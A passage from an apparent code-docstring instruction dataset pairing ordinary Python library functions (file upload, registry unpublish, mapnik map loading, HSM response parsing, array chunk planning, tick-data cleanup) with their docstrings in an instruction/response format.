commit_callback(100.0)
return resp
else:
commit_callback(float(resp.commit_progress))
time.sleep(poll_interval) | Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10% | Below is the the instruction that describes the task:
### Input:
Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10%
### Response:
def upload_data(self, file_or_str, chunk_size=analyzere.upload_chunk_size,
poll_interval=analyzere.upload_poll_interval,
upload_callback=lambda x: None,
commit_callback=lambda x: None):
"""
Accepts a file-like object or string and uploads it. Files are
automatically uploaded in chunks. The default chunk size is 16MiB and
can be overwritten by specifying the number of bytes in the
``chunk_size`` variable.
Accepts an optional poll_interval for temporarily overriding the
default value `analyzere.upload_poll_interval`.
Implements the tus protocol.
Takes optional callbacks that return the percentage complete for the
given "phase" of upload: upload/commit.
Callback values are returned as 10.0 for 10%
"""
if not callable(upload_callback):
raise Exception('provided upload_callback is not callable')
if not callable(commit_callback):
raise Exception('provided commit_callback is not callable')
file_obj = StringIO(file_or_str) if isinstance(
file_or_str, six.string_types) else file_or_str
# Upload file with known entity size if file object supports random
# access.
length = None
if hasattr(file_obj, 'seek'):
length = utils.file_length(file_obj)
# Initiate upload session
request_raw('post', self._data_path,
headers={'Entity-Length': str(length)})
else:
request_raw('post', self._data_path)
# Upload chunks
for chunk, offset in utils.read_in_chunks(file_obj, chunk_size):
headers = {'Offset': str(offset),
'Content-Type': 'application/offset+octet-stream'}
request_raw('patch', self._data_path, headers=headers, body=chunk)
# if there is a known size, and an upload callback, call it
if length:
upload_callback(offset * 100.0 / length)
upload_callback(100.0)
# Commit the session
request_raw('post', self._commit_path)
# Block until data has finished processing
while True:
resp = self.upload_status
if (resp.status == 'Processing Successful' or resp.status == 'Processing Failed'):
commit_callback(100.0)
return resp
else:
commit_callback(float(resp.commit_progress))
time.sleep(poll_interval) |
def unpublish(namespace, name, version, registry=None):
''' Try to unpublish a recently published version. Return any errors that
occur.
'''
registry = registry or Registry_Base_URL
url = '%s/%s/%s/versions/%s' % (
registry,
namespace,
name,
version
)
headers = _headersForRegistry(registry)
response = requests.delete(url, headers=headers)
response.raise_for_status()
return None | Try to unpublish a recently published version. Return any errors that
occur. | Below is the the instruction that describes the task:
### Input:
Try to unpublish a recently published version. Return any errors that
occur.
### Response:
def unpublish(namespace, name, version, registry=None):
''' Try to unpublish a recently published version. Return any errors that
occur.
'''
registry = registry or Registry_Base_URL
url = '%s/%s/%s/versions/%s' % (
registry,
namespace,
name,
version
)
headers = _headersForRegistry(registry)
response = requests.delete(url, headers=headers)
response.raise_for_status()
return None |
def load_map(map, src_file, output_dir, scale=1, cache_dir=None, datasources_cfg=None, user_styles=[], verbose=False):
""" Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
...
"""
scheme, n, path, p, q, f = urlparse(src_file)
if scheme in ('file', ''):
assert exists(src_file), "We'd prefer an input file that exists to one that doesn't"
if cache_dir is None:
cache_dir = expanduser(CACHE_DIR)
# only make the cache dir if it wasn't user-provided
if not isdir(cache_dir):
mkdir(cache_dir)
chmod(cache_dir, 0755)
dirs = Directories(output_dir, realpath(cache_dir), dirname(src_file))
compile(src_file, dirs, verbose, datasources_cfg=datasources_cfg, user_styles=user_styles, scale=scale).to_mapnik(map, dirs) | Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
... | Below is the the instruction that describes the task:
### Input:
Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
...
### Response:
def load_map(map, src_file, output_dir, scale=1, cache_dir=None, datasources_cfg=None, user_styles=[], verbose=False):
""" Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map().
Parameters:
map:
Instance of mapnik.Map.
src_file:
Location of stylesheet .mml file. Can be relative path, absolute path,
or fully-qualified URL of a remote stylesheet.
output_dir:
...
Keyword Parameters:
scale:
Optional scale value for output map, 2 doubles the size for high-res displays.
cache_dir:
...
datasources_cfg:
...
user_styles:
A optional list of files or URLs, that override styles defined in
the map source. These are evaluated in order, with declarations from
later styles overriding those from earlier styles.
verbose:
...
"""
scheme, n, path, p, q, f = urlparse(src_file)
if scheme in ('file', ''):
assert exists(src_file), "We'd prefer an input file that exists to one that doesn't"
if cache_dir is None:
cache_dir = expanduser(CACHE_DIR)
# only make the cache dir if it wasn't user-provided
if not isdir(cache_dir):
mkdir(cache_dir)
chmod(cache_dir, 0755)
dirs = Directories(output_dir, realpath(cache_dir), dirname(src_file))
compile(src_file, dirs, verbose, datasources_cfg=datasources_cfg, user_styles=user_styles, scale=scale).to_mapnik(map, dirs) |
def parser(scope, usage=''):
"""
Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser>
"""
subcmds = []
for cmd in commands(scope):
subcmds.append(cmd.usage())
if subcmds:
subcmds.sort()
usage += '\n\nSub-Commands:\n '
usage += '\n '.join(subcmds)
parse = PARSER_CLASS(usage=usage)
parse.prog = PROGRAM_NAME
return parse | Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser> | Below is the the instruction that describes the task:
### Input:
Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser>
### Response:
def parser(scope, usage=''):
"""
Generates a default parser for the inputted scope.
:param scope | <dict> || <module>
usage | <str>
callable | <str>
:return <OptionParser>
"""
subcmds = []
for cmd in commands(scope):
subcmds.append(cmd.usage())
if subcmds:
subcmds.sort()
usage += '\n\nSub-Commands:\n '
usage += '\n '.join(subcmds)
parse = PARSER_CLASS(usage=usage)
parse.prog = PROGRAM_NAME
return parse |
def parse_result(self, data):
"""
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
"""
# typedef struct {
# uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs)
# uint32_t keyHandle; // Key handle
# YSM_STATUS status; // Status
# uint8_t numBytes; // Number of bytes in AEAD block
# uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block
# } YSM_AEAD_GENERATE_RESP;
nonce, \
key_handle, \
self.status, \
num_bytes = struct.unpack_from("< %is I B B" % (pyhsm.defines.YSM_AEAD_NONCE_SIZE), data, 0)
pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
if self.status == pyhsm.defines.YSM_STATUS_OK:
pyhsm.util.validate_cmd_response_nonce(nonce, self.nonce)
offset = pyhsm.defines.YSM_AEAD_NONCE_SIZE + 6
aead = data[offset:offset + num_bytes]
self.response = YHSM_GeneratedAEAD(nonce, key_handle, aead)
return self.response
else:
raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status) | Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed. | Below is the the instruction that describes the task:
### Input:
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
### Response:
def parse_result(self, data):
"""
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
"""
# typedef struct {
# uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs)
# uint32_t keyHandle; // Key handle
# YSM_STATUS status; // Status
# uint8_t numBytes; // Number of bytes in AEAD block
# uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block
# } YSM_AEAD_GENERATE_RESP;
nonce, \
key_handle, \
self.status, \
num_bytes = struct.unpack_from("< %is I B B" % (pyhsm.defines.YSM_AEAD_NONCE_SIZE), data, 0)
pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
if self.status == pyhsm.defines.YSM_STATUS_OK:
pyhsm.util.validate_cmd_response_nonce(nonce, self.nonce)
offset = pyhsm.defines.YSM_AEAD_NONCE_SIZE + 6
aead = data[offset:offset + num_bytes]
self.response = YHSM_GeneratedAEAD(nonce, key_handle, aead)
return self.response
else:
raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status) |
def str_transmission_rate(self):
"""Returns a tuple of human readable transmission rates in bytes."""
upstream, downstream = self.transmission_rate
return (
fritztools.format_num(upstream),
fritztools.format_num(downstream)
) | Returns a tuple of human readable transmission rates in bytes. | Below is the the instruction that describes the task:
### Input:
Returns a tuple of human readable transmission rates in bytes.
### Response:
def str_transmission_rate(self):
"""Returns a tuple of human readable transmission rates in bytes."""
upstream, downstream = self.transmission_rate
return (
fritztools.format_num(upstream),
fritztools.format_num(downstream)
) |
def _derive_temporalnetwork(self, f, i, tag, params, confounds_exist, confound_files):
"""
Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
"""
data = load_tabular_file(f, index_col=True, header=True)
fs, _ = drop_bids_suffix(f)
save_name, save_dir, _ = self._save_namepaths_bids_derivatives(
fs, tag, 'tvc', 'tvcconn')
if 'weight-var' in params.keys():
if params['weight-var'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-var'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
if 'weight-mean' in params.keys():
if params['weight-mean'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-mean'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
params['report'] = 'yes'
params['report_path'] = save_dir + '/report/'
params['report_filename'] = save_name + '_derivationreport.html'
if not os.path.exists(params['report_path']):
os.makedirs(params['report_path'])
if 'dimord' not in params:
params['dimord'] = 'time,node'
dfc = teneto.timeseries.derive_temporalnetwork(data.values, params)
dfc_net = TemporalNetwork(from_array=dfc, nettype='wu')
dfc_net.network.to_csv(save_dir + save_name + '.tsv', sep='\t')
sidecar = get_sidecar(f)
sidecar['tvc'] = params
if 'weight-var' in sidecar['tvc']:
sidecar['tvc']['weight-var'] = True
sidecar['tvc']['fc source'] = fc_files
if 'weight-mean' in sidecar['tvc']:
sidecar['tvc']['weight-mean'] = True
sidecar['tvc']['fc source'] = fc_files
sidecar['tvc']['inputfile'] = f
sidecar['tvc']['description'] = 'Time varying connectivity information.'
with open(save_dir + save_name + '.json', 'w') as fs:
json.dump(sidecar, fs)
if confounds_exist:
analysis_step = 'tvc-derive'
df = pd.read_csv(confound_files[i], sep='\t')
df = df.fillna(df.median())
ind = np.triu_indices(dfc.shape[0], k=1)
dfc_df = pd.DataFrame(dfc[ind[0], ind[1], :].transpose())
# If windowed, prune df so that it matches with dfc_df
if len(df) != len(dfc_df):
df = df.iloc[int(np.round((params['windowsize']-1)/2)): int(np.round((params['windowsize']-1)/2)+len(dfc_df))]
df.reset_index(inplace=True, drop=True)
# NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF.
dfc_df_z = (dfc_df - dfc_df.mean())
df_z = (df - df.mean())
R_df = dfc_df_z.T.dot(df_z).div(len(dfc_df)).div(
df_z.std(ddof=0)).div(dfc_df_z.std(ddof=0), axis=0)
R_df_describe = R_df.describe()
desc_index = R_df_describe.index
confound_report_dir = params['report_path'] + \
'/' + save_name + '_confoundcorr/'
confound_report_figdir = confound_report_dir + 'figures/'
if not os.path.exists(confound_report_figdir):
os.makedirs(confound_report_figdir)
report = '<html><body>'
report += '<h1> Correlation of ' + analysis_step + ' and confounds.</h1>'
for c in R_df.columns:
fig, ax = plt.subplots(1)
ax = sns.distplot(
R_df[c], hist=False, color='m', ax=ax, kde_kws={"shade": True})
fig.savefig(confound_report_figdir + c + '.png')
plt.close(fig)
report += '<h2>' + c + '</h2>'
for ind_name, r in enumerate(R_df_describe[c]):
report += str(desc_index[ind_name]) + ': '
report += str(r) + '<br>'
report += 'Distribution of corrlation values:'
report += '<img src=' + \
os.path.abspath(confound_report_figdir) + \
'/' + c + '.png><br><br>'
report += '</body></html>'
with open(confound_report_dir + save_name + '_confoundcorr.html', 'w') as file:
file.write(report) | Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing. | Below is the the instruction that describes the task:
### Input:
Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
### Response:
def _derive_temporalnetwork(self, f, i, tag, params, confounds_exist, confound_files):
"""
Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
"""
data = load_tabular_file(f, index_col=True, header=True)
fs, _ = drop_bids_suffix(f)
save_name, save_dir, _ = self._save_namepaths_bids_derivatives(
fs, tag, 'tvc', 'tvcconn')
if 'weight-var' in params.keys():
if params['weight-var'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-var'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
if 'weight-mean' in params.keys():
if params['weight-mean'] == 'from-subject-fc':
fc_files = self.get_selected_files(
quiet=1, pipeline='functionalconnectivity', forfile=f)
if len(fc_files) == 1:
# Could change to load_data call
params['weight-mean'] = load_tabular_file(
fc_files[0]).values
else:
raise ValueError('Cannot correctly find FC files')
params['report'] = 'yes'
params['report_path'] = save_dir + '/report/'
params['report_filename'] = save_name + '_derivationreport.html'
if not os.path.exists(params['report_path']):
os.makedirs(params['report_path'])
if 'dimord' not in params:
params['dimord'] = 'time,node'
dfc = teneto.timeseries.derive_temporalnetwork(data.values, params)
dfc_net = TemporalNetwork(from_array=dfc, nettype='wu')
dfc_net.network.to_csv(save_dir + save_name + '.tsv', sep='\t')
sidecar = get_sidecar(f)
sidecar['tvc'] = params
if 'weight-var' in sidecar['tvc']:
sidecar['tvc']['weight-var'] = True
sidecar['tvc']['fc source'] = fc_files
if 'weight-mean' in sidecar['tvc']:
sidecar['tvc']['weight-mean'] = True
sidecar['tvc']['fc source'] = fc_files
sidecar['tvc']['inputfile'] = f
sidecar['tvc']['description'] = 'Time varying connectivity information.'
with open(save_dir + save_name + '.json', 'w') as fs:
json.dump(sidecar, fs)
if confounds_exist:
analysis_step = 'tvc-derive'
df = pd.read_csv(confound_files[i], sep='\t')
df = df.fillna(df.median())
ind = np.triu_indices(dfc.shape[0], k=1)
dfc_df = pd.DataFrame(dfc[ind[0], ind[1], :].transpose())
# If windowed, prune df so that it matches with dfc_df
if len(df) != len(dfc_df):
df = df.iloc[int(np.round((params['windowsize']-1)/2)): int(np.round((params['windowsize']-1)/2)+len(dfc_df))]
df.reset_index(inplace=True, drop=True)
# NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF.
dfc_df_z = (dfc_df - dfc_df.mean())
df_z = (df - df.mean())
R_df = dfc_df_z.T.dot(df_z).div(len(dfc_df)).div(
df_z.std(ddof=0)).div(dfc_df_z.std(ddof=0), axis=0)
R_df_describe = R_df.describe()
desc_index = R_df_describe.index
confound_report_dir = params['report_path'] + \
'/' + save_name + '_confoundcorr/'
confound_report_figdir = confound_report_dir + 'figures/'
if not os.path.exists(confound_report_figdir):
os.makedirs(confound_report_figdir)
report = '<html><body>'
report += '<h1> Correlation of ' + analysis_step + ' and confounds.</h1>'
for c in R_df.columns:
fig, ax = plt.subplots(1)
ax = sns.distplot(
R_df[c], hist=False, color='m', ax=ax, kde_kws={"shade": True})
fig.savefig(confound_report_figdir + c + '.png')
plt.close(fig)
report += '<h2>' + c + '</h2>'
for ind_name, r in enumerate(R_df_describe[c]):
report += str(desc_index[ind_name]) + ': '
report += str(r) + '<br>'
report += 'Distribution of corrlation values:'
report += '<img src=' + \
os.path.abspath(confound_report_figdir) + \
'/' + c + '.png><br><br>'
report += '</body></html>'
with open(confound_report_dir + save_name + '_confoundcorr.html', 'w') as file:
file.write(report) |
def _post_query(self, **query_dict):
"""Perform a POST query against Solr and return the response as a Python
dict."""
param_dict = query_dict.copy()
return self._send_query(do_post=True, **param_dict) | Perform a POST query against Solr and return the response as a Python
dict. | Below is the the instruction that describes the task:
### Input:
Perform a POST query against Solr and return the response as a Python
dict.
### Response:
def _post_query(self, **query_dict):
"""Perform a POST query against Solr and return the response as a Python
dict."""
param_dict = query_dict.copy()
return self._send_query(do_post=True, **param_dict) |
def exec_python_rc(*args, **kwargs):
"""
Wrap running python script in a subprocess.
Return exit code of the invoked command.
"""
cmdargs, kwargs = __wrap_python(args, kwargs)
return exec_command_rc(*cmdargs, **kwargs) | Wrap running python script in a subprocess.
Return exit code of the invoked command. | Below is the the instruction that describes the task:
### Input:
Wrap running python script in a subprocess.
Return exit code of the invoked command.
### Response:
def exec_python_rc(*args, **kwargs):
"""
Wrap running python script in a subprocess.
Return exit code of the invoked command.
"""
cmdargs, kwargs = __wrap_python(args, kwargs)
return exec_command_rc(*cmdargs, **kwargs) |
def reset_tip_tracking(self):
"""
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
"""
self.current_tip(None)
self.tip_rack_iter = iter([])
if self.has_tip_rack():
iterables = self.tip_racks
if self.channels > 1:
iterables = [c for rack in self.tip_racks for c in rack.cols]
else:
iterables = [w for rack in self.tip_racks for w in rack]
if self.starting_tip:
iterables = iterables[iterables.index(self.starting_tip):]
self.tip_rack_iter = itertools.chain(iterables) | Resets the :any:`Pipette` tip tracking, "refilling" the tip racks | Below is the the instruction that describes the task:
### Input:
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
### Response:
def reset_tip_tracking(self):
"""
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
"""
self.current_tip(None)
self.tip_rack_iter = iter([])
if self.has_tip_rack():
iterables = self.tip_racks
if self.channels > 1:
iterables = [c for rack in self.tip_racks for c in rack.cols]
else:
iterables = [w for rack in self.tip_racks for w in rack]
if self.starting_tip:
iterables = iterables[iterables.index(self.starting_tip):]
self.tip_rack_iter = itertools.chain(iterables) |
def getplan(self, size="150", axes=None, padding=None):
"""
Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding
"""
from numpy import dtype as gettype
# initialize with all elements in one chunk
plan = self.vshape
# check for subset of axes
if axes is None:
if isinstance(size, str):
axes = arange(len(self.vshape))
else:
axes = arange(len(size))
else:
axes = asarray(axes, 'int')
# set padding
pad = array(len(self.vshape)*[0, ])
if padding is not None:
pad[axes] = padding
# set the plan
if isinstance(size, tuple):
plan[axes] = size
elif isinstance(size, str):
# convert from kilobytes
size = 1000.0 * float(size)
# calculate from dtype
elsize = gettype(self.dtype).itemsize
nelements = prod(self.vshape)
dims = self.vshape[self.vmask(axes)]
if size <= elsize:
s = ones(len(axes))
else:
remsize = 1.0 * nelements * elsize
s = []
for (i, d) in enumerate(dims):
minsize = remsize/d
if minsize >= size:
s.append(1)
remsize = minsize
continue
else:
s.append(min(d, floor(size/minsize)))
s[i+1:] = plan[i+1:]
break
plan[axes] = s
else:
raise ValueError("Chunk size not understood, must be tuple or int")
return plan, pad | Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding | Below is the the instruction that describes the task:
### Input:
Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding
### Response:
def getplan(self, size="150", axes=None, padding=None):
"""
Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding
"""
from numpy import dtype as gettype
# initialize with all elements in one chunk
plan = self.vshape
# check for subset of axes
if axes is None:
if isinstance(size, str):
axes = arange(len(self.vshape))
else:
axes = arange(len(size))
else:
axes = asarray(axes, 'int')
# set padding
pad = array(len(self.vshape)*[0, ])
if padding is not None:
pad[axes] = padding
# set the plan
if isinstance(size, tuple):
plan[axes] = size
elif isinstance(size, str):
# convert from kilobytes
size = 1000.0 * float(size)
# calculate from dtype
elsize = gettype(self.dtype).itemsize
nelements = prod(self.vshape)
dims = self.vshape[self.vmask(axes)]
if size <= elsize:
s = ones(len(axes))
else:
remsize = 1.0 * nelements * elsize
s = []
for (i, d) in enumerate(dims):
minsize = remsize/d
if minsize >= size:
s.append(1)
remsize = minsize
continue
else:
s.append(min(d, floor(size/minsize)))
s[i+1:] = plan[i+1:]
break
plan[axes] = s
else:
raise ValueError("Chunk size not understood, must be tuple or int")
return plan, pad |
def merge_dicts(dicts, deepcopy=False):
"""Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts
"""
assert isinstance(dicts, list) and all(isinstance(d, dict) for d in dicts)
return dict(chain(*[copy.deepcopy(d).items() if deepcopy else d.items()
for d in dicts])) | Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts | Below is the the instruction that describes the task:
### Input:
Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts
### Response:
def merge_dicts(dicts, deepcopy=False):
"""Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts
"""
assert isinstance(dicts, list) and all(isinstance(d, dict) for d in dicts)
return dict(chain(*[copy.deepcopy(d).items() if deepcopy else d.items()
for d in dicts])) |
def to_interval_values(self):
'''Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field.
'''
ints, vals = [], []
for obs in self.data:
ints.append([obs.time, obs.time + obs.duration])
vals.append(obs.value)
if not ints:
return np.empty(shape=(0, 2), dtype=float), []
return np.array(ints), vals | Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field. | Below is the the instruction that describes the task:
### Input:
Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field.
### Response:
def to_interval_values(self):
'''Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field.
'''
ints, vals = [], []
for obs in self.data:
ints.append([obs.time, obs.time + obs.duration])
vals.append(obs.value)
if not ints:
return np.empty(shape=(0, 2), dtype=float), []
return np.array(ints), vals |
def is_measure(self):
"""Return true if the colum is a dimension"""
from ambry.valuetype.core import ROLE
return self.role == ROLE.MEASURE | Return true if the colum is a dimension | Below is the the instruction that describes the task:
### Input:
Return true if the colum is a dimension
### Response:
def is_measure(self):
"""Return true if the colum is a dimension"""
from ambry.valuetype.core import ROLE
return self.role == ROLE.MEASURE |
def _fix_history_sequence(self, df, table):
""" fix out-of-sequence ticks/bars """
# remove "Unnamed: x" columns
cols = df.columns[df.columns.str.startswith('Unnamed:')].tolist()
df.drop(cols, axis=1, inplace=True)
# remove future dates
df['datetime'] = pd.to_datetime(df['datetime'], utc=True)
blacklist = df[df['datetime'] > pd.to_datetime('now', utc=True)]
df = df.loc[set(df.index) - set(blacklist)] # .tail()
# loop through data, symbol by symbol
dfs = []
bad_ids = [blacklist['id'].values.tolist()]
for symbol_id in list(df['symbol_id'].unique()):
data = df[df['symbol_id'] == symbol_id].copy()
# sort by id
data.sort_values('id', axis=0, ascending=True, inplace=False)
# convert index to column
data.loc[:, "ix"] = data.index
data.reset_index(inplace=True)
# find out of sequence ticks/bars
malformed = data.shift(1)[(data['id'] > data['id'].shift(1)) & (
data['datetime'] < data['datetime'].shift(1))]
# cleanup rows
if malformed.empty:
# if all rows are in sequence, just remove last row
dfs.append(data)
else:
# remove out of sequence rows + last row from data
index = [
x for x in data.index.values if x not in malformed['ix'].values]
dfs.append(data.loc[index])
# add to bad id list (to remove from db)
bad_ids.append(list(malformed['id'].values))
# combine all lists
data = pd.concat(dfs, sort=True)
# flatten bad ids
bad_ids = sum(bad_ids, [])
# remove bad ids from db
if bad_ids:
bad_ids = list(map(str, map(int, bad_ids)))
self.dbcurr.execute("DELETE FROM greeks WHERE %s IN (%s)" % (
table.lower()[:-1] + "_id", ",".join(bad_ids)))
self.dbcurr.execute("DELETE FROM " + table.lower() +
" WHERE id IN (%s)" % (",".join(bad_ids)))
try:
self.dbconn.commit()
except Exception as e:
self.dbconn.rollback()
# return
return data.drop(['id', 'ix', 'index'], axis=1) | fix out-of-sequence ticks/bars | Below is the the instruction that describes the task:
### Input:
fix out-of-sequence ticks/bars
### Response:
def _fix_history_sequence(self, df, table):
""" fix out-of-sequence ticks/bars """
# remove "Unnamed: x" columns
cols = df.columns[df.columns.str.startswith('Unnamed:')].tolist()
df.drop(cols, axis=1, inplace=True)
# remove future dates
df['datetime'] = pd.to_datetime(df['datetime'], utc=True)
blacklist = df[df['datetime'] > pd.to_datetime('now', utc=True)]
df = df.loc[set(df.index) - set(blacklist)] # .tail()
# loop through data, symbol by symbol
dfs = []
bad_ids = [blacklist['id'].values.tolist()]
for symbol_id in list(df['symbol_id'].unique()):
data = df[df['symbol_id'] == symbol_id].copy()
# sort by id
data.sort_values('id', axis=0, ascending=True, inplace=False)
# convert index to column
data.loc[:, "ix"] = data.index
data.reset_index(inplace=True)
# find out of sequence ticks/bars
malformed = data.shift(1)[(data['id'] > data['id'].shift(1)) & (
data['datetime'] < data['datetime'].shift(1))]
# cleanup rows
if malformed.empty:
# if all rows are in sequence, just remove last row
dfs.append(data)
else:
# remove out of sequence rows + last row from data
index = [
x for x in data.index.values if x not in malformed['ix'].values]
dfs.append(data.loc[index])
# add to bad id list (to remove from db)
bad_ids.append(list(malformed['id'].values))
# combine all lists
data = pd.concat(dfs, sort=True)
# flatten bad ids
bad_ids = sum(bad_ids, [])
# remove bad ids from db
if bad_ids:
bad_ids = list(map(str, map(int, bad_ids)))
self.dbcurr.execute("DELETE FROM greeks WHERE %s IN (%s)" % (
table.lower()[:-1] + "_id", ",".join(bad_ids)))
